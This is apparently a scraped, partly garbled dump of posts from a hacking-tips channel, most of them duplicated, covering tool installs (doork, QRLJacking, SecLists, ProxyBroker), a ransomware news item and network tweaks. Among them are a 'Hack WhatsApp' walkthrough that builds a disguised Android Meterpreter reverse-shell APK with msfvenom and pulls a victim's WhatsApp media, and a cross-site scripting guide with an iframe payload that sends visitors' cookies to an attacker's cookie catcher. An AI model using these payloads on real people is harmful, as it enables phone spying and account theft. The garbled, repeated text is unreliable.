β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install
2) pip install beautifulsoup4
3) pip install requests
4) pip install Django
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install
2) pip install beautifulsoup4
3) pip install requests
4) pip install Django
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANOTHER WHATSAPP HACKING -2020 UPDATED
QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the βLogin with QR codeβ feature as a secure way to login into accounts. In a nutshell, the victim scans the attackerβs QR code which results in session hijacking.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Update Firefox browser to the latest version
2) Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :
3) chmod +x geckodriver
4) sudo mv -f geckodriver /usr/local/share/geckodriver
5) sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
6) sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
7) Clone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJacker
8) Install all the requirements with pip install -r requirements.txt
9) Now you can run the framework with python3 QrlJacker.py --help
π¦Tested by us on :
> Ubuntu lastest v
> Kali Linux lastest v
> parrot os lastest v
> fedora lastest v
π¦MORE TUTORIAL ABOUT IT :
https://www.owasp.org/index.php/QRLJacking
https://www.owasp.org/index.php/OWASP_QRLJacker
enjoyβ€οΈππ»
@UndercodeTesting
git topic 2020β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ANOTHER WHATSAPP HACKING -2020 UPDATED
QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the βLogin with QR codeβ feature as a secure way to login into accounts. In a nutshell, the victim scans the attackerβs QR code which results in session hijacking.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Update Firefox browser to the latest version
2) Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :
3) chmod +x geckodriver
4) sudo mv -f geckodriver /usr/local/share/geckodriver
5) sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
6) sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
7) Clone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJacker
8) Install all the requirements with pip install -r requirements.txt
9) Now you can run the framework with python3 QrlJacker.py --help
π¦Tested by us on :
> Ubuntu lastest v
> Kali Linux lastest v
> parrot os lastest v
> fedora lastest v
π¦MORE TUTORIAL ABOUT IT :
https://www.owasp.org/index.php/QRLJacking
https://www.owasp.org/index.php/OWASP_QRLJacker
enjoyβ€οΈππ»
@UndercodeTesting
git topic 2020β
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
Releases Β· mozilla/geckodriver
WebDriver Classic proxy for automating Firefox through Marionette - mozilla/geckodriver
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 topic fuzzing payloads, web shells
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Kali Linux (Tool Page)
open terminal and type :
> apt -y install seclists
enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 topic fuzzing payloads, web shells
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Kali Linux (Tool Page)
open terminal and type :
> apt -y install seclists
enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
TLS & SSL Penetration Testing.pdf
1.3 MB
Full tutorial with pictures
enjoyβ€οΈππ»
enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Change PHP's default Fastcgi mode to ISAPI mode (only run in Windows environment)
1) Download the ZIP file package of PHP at http://www.php.net (note that the version should correspond)
2) Copy the php4isapi.dll in the sapi directory to the c:\php directory
3) Enter the virtual host "Website Management"-"Virtual Host" of the management platform--In the server settings, modify the PHP mapping to change the original:
.php,C:\PHP\php.exe,5,GET,HEAD,POST,TRACE|
4) Change Into:
.php,C:\PHP\php4isapi.dll,5,GET,HEAD,POST,TRACE|
(Required only for IIS 6) Open the IIS manager, click Web service extension, click the properties of php, "Required File"---Add in--Select "C:\PHP\php4isapi.dll", after confirming, PHP can call.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Change PHP's default Fastcgi mode to ISAPI mode (only run in Windows environment)
1) Download the ZIP file package of PHP at http://www.php.net (note that the version should correspond)
2) Copy the php4isapi.dll in the sapi directory to the c:\php directory
3) Enter the virtual host "Website Management"-"Virtual Host" of the management platform--In the server settings, modify the PHP mapping to change the original:
.php,C:\PHP\php.exe,5,GET,HEAD,POST,TRACE|
4) Change Into:
.php,C:\PHP\php4isapi.dll,5,GET,HEAD,POST,TRACE|
(Required only for IIS 6) Open the IIS manager, click Web service extension, click the properties of php, "Required File"---Add in--Select "C:\PHP\php4isapi.dll", after confirming, PHP can call.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript email attachments may carry malicious code ?
< Recently there has been a ransomware program called RAA, which is written entirely in JavaScript and can lock user files by using a strong encryption program.
> Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.
> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.
> Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESETβs Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages by default. But RAA is different, this is malware written entirely in JavaScript.
> Experts technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.
> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.
> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.
> It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.
ENJOY β€οΈππ»
written by kEIVEN
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JavaScript email attachments may carry malicious code ?
< Recently there has been a ransomware program called RAA, which is written entirely in JavaScript and can lock user files by using a strong encryption program.
> Most malicious software in Windows is written in a compiled language such as C or C++ and spread in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch or PowerShell.
> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.
> Attackers have only recently started using this technique. Last month, Microsoft warned that js attachments in malicious emails might carry viruses, and ESETβs Security Research Institute also warned that some js attachments might run Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages by default. But RAA is different, this is malware written entirely in JavaScript.
> Experts technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.
> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.
> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.
> It is very unusual to include JavaScript attachments in emails, so users should avoid opening such files even if they are contained in .zip archives. .js files are rarely used in other places except in websites and browsers.
ENJOY β€οΈππ»
written by kEIVEN
β β β Uππ»βΊπ«Δπ¬πβ β β β
Androguard usage.pdf
161.6 KB
How to use Androguard- hack
full tutorial for beginers #requested
full tutorial for beginers #requested
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.
open terminal and type :
1οΈβ£Let's create a payload virus :
1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk
2) msfconsole
3) use exploit/multi/handler
4) set payload android/meterpreter/reversetcp
5) set lhost (YOUR IP)
6) exploit
7) cd /
8) ls -l
now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :
9) cd sdcard
10) ls -l
2οΈβ£ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.
1) cd WhatsApp
2) ls -l
3) cd Media
4) ls -l
After coming inside WhatsApp, you will have some such files open in front of you, where you have to
go to the media folder.
5) cd WhatsApp \ Images
6) ls -l
(Like I will go to the image folder and download an image and show you the commands you will find)
> example download (YOUR FILE NAME)
7) file has been downloaded, this file will
come in the root folder in your Linux.
ENJOY β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack WhatsApp using Meterpreter in parrot linux or Kali Linux.
open terminal and type :
1οΈβ£Let's create a payload virus :
1) msfvenom -p android/meterpreter/reversetcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk
2) msfconsole
3) use exploit/multi/handler
4) set payload android/meterpreter/reversetcp
5) set lhost (YOUR IP)
6) exploit
7) cd /
8) ls -l
now you have been connected to the phone, now you have to take the data of his WhatsApp from his phone, for which first you have to go to the root files of his phone, whose command is given :
9) cd sdcard
10) ls -l
2οΈβ£ After coming to the SD card, you will see the interface of some such applications where all the applications installed in his phone will be visible to everyone.
1) cd WhatsApp
2) ls -l
3) cd Media
4) ls -l
After coming inside WhatsApp, you will have some such files open in front of you, where you have to
go to the media folder.
5) cd WhatsApp \ Images
6) ls -l
(Like I will go to the image folder and download an image and show you the commands you will find)
> example download (YOUR FILE NAME)
7) file has been downloaded, this file will
come in the root folder in your Linux.
ENJOY β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.
π¦FEATURES :
-Finds more than 7000 working proxies from ~50 sources.
-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
-All proxies are checked to support Cookies and Referer (and POST requests if required).
Automatically removes duplicate proxies.
-Is asynchronous.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) To install last stable release from pypi:
$ pip install proxybroker
2) MANUAL INSTALL :
$ pip install -U git+https://github.com/constverum/ProxyBroker.git
3) Find and save to a file 10 US proxies (without a check):
$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt
4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:
$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ProxyBroker is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.
π¦FEATURES :
-Finds more than 7000 working proxies from ~50 sources.
-Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
-Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
-Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
-All proxies are checked to support Cookies and Referer (and POST requests if required).
Automatically removes duplicate proxies.
-Is asynchronous.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) To install last stable release from pypi:
$ pip install proxybroker
2) MANUAL INSTALL :
$ pip install -U git+https://github.com/constverum/ProxyBroker.git
3) Find and save to a file 10 US proxies (without a check):
$ proxybroker grab --countries US --limit 10 --outfile ./proxies.txt
4) Serve
Run a local proxy server that distributes incoming requests to a pool of found HTTP(S) proxies with the high level of anonymity:
$ proxybroker serve --host 127.0.0.1 --port 8888 --types HTTP HTTPS --lvl High
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEBSITE HACKING METHODE
π¦WEBSITE HACKING METHODE
1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is not vulnerable to a cross-site scripting attack, then this will not work.
2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
2)
Go to create a post. You will need to type some special code into the "post" which will capture the data of all who click on it.
You'll want to test to see if the system filters out code. Post
<script>window.alert("test")</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
3)
Create and upload your cookie catcher. The goal of this attack is to capture a user's cookies, which allows you access to their account for websites with vulnerable logins. You'll need a cookie catcher, which will capture your target's cookies and reroute them. Upload the catcher to a website you have access to and that supports PHP and is vulnerable to remote code execution via upload. An example cookie catcher code can be found in the sample section.
4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
@UndercodeTesting
(source wiki)
enjoy
β β β Uππ»βΊπ«Δπ¬πβ β β β
@UndercodeTesting
(source wiki)
enjoy
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEED UP DOWNLOAD SPEED
use the correct channel type for your router
Test a different modem/router. The biggest cause of slowed down
internet is a bad modem.
Scan for viruses.
Check for on-system interference.
Check your filters.
Try getting rid of your cordless phone
Plug in.
Check for external interference.
Check for Foxtel or other types of TV.
use interent download manager
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SPEED UP DOWNLOAD SPEED
use the correct channel type for your router
Test a different modem/router. The biggest cause of slowed down
internet is a bad modem.
Scan for viruses.
Check for on-system interference.
Check your filters.
Try getting rid of your cordless phone
Plug in.
Check for external interference.
Check for Foxtel or other types of TV.
use interent download manager
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Optimize your devices' DNS :-Speedup net speed :
I'm using Cloudflare as an example, but these techniques will work with any DNS provider.
1οΈβ£ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
1) For IPv4: 1.1.1.1 and 1.0.0.1
2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
π °οΈWINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5) Double-click on the active network adapter.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
π ±οΈWith Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
1) Click on Network and Internet.
2) Click on Change Adapter Settings.
3) Right click on the Wi-Fi network you are connected to, then click Properties.
4) Select Internet Protocol Version 4 (or Version 6 if desired).
5) Click Properties.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
WELL DONE
E N J O Y β€οΈππ»
wiki source
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Optimize your devices' DNS :-Speedup net speed :
I'm using Cloudflare as an example, but these techniques will work with any DNS provider.
1οΈβ£ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
1) For IPv4: 1.1.1.1 and 1.0.0.1
2) For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
π °οΈWINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5) Double-click on the active network adapter.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
π ±οΈWith Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
1) Click on Network and Internet.
2) Click on Change Adapter Settings.
3) Right click on the Wi-Fi network you are connected to, then click Properties.
4) Select Internet Protocol Version 4 (or Version 6 if desired).
5) Click Properties.
6) Write down any existing DNS server entries for future reference.
7) Click Use The Following DNS Server Addresses.
8) Replace those addresses with the 1.1.1.1 DNS addresses:
> For IPv4: 1.1.1.1 and 1.0.0.1
> For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
WELL DONE
E N J O Y β€οΈππ»
wiki source
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β